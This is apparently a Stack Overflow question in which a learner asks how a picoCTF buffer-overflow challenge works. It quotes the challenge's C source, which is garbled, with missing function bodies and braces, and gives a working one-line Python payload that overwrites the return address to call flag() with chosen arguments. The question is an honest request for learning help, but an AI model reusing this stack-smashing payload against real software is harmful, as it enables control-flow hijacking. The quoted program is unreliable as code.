having issues in understanding the buffer-overflow process


This is the problem from recent picoCTF buffer-overflow challenge. here i have some doubts. I am learning bufferoverlow, so my questions may be trivial.

i am not able to understand the proper functionality of this program. This was the program given:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 176
#define FLAGSIZE 64

void flag(unsigned int arg1, unsigned int arg2) {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");

  if (arg1 != 0xDEADBEEF)
  if (arg2 != 0xC0DED00D)

void vuln(){
  char buf[BUFSIZE];

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  return 0;

the solution for this challenge is:

python -c "import struct;print 'A' * 188 + struct.pack('<I', 0x080485e6) + '\x00'*4 + struct.pack('<I', 0xDEADBEEF) + struct.pack('<I', 0xC0DED00D)" | ./overflow2

this 0x080485e6 is the address of flag() function, and 188 is the location where overflow happens.

Now my doubts are:

  1. how exactly this program is working? Like

    why there is need of second padding of 4 bytes in playload? And i tried to send 8,16,32 byte but it is only giving answer only on 4 byte, why is that?

what is the use of those two value('0xDEADBEEF' & '0XC0DED00D'), how these values are stopping program from reading 'flag.txt' file? And why do i need to put them at the last in the payload?

asked on Stack Overflow Oct 12, 2019 by ASH

0 Answers

Nobody has answered this question yet.

User contributions licensed under CC BY-SA 3.0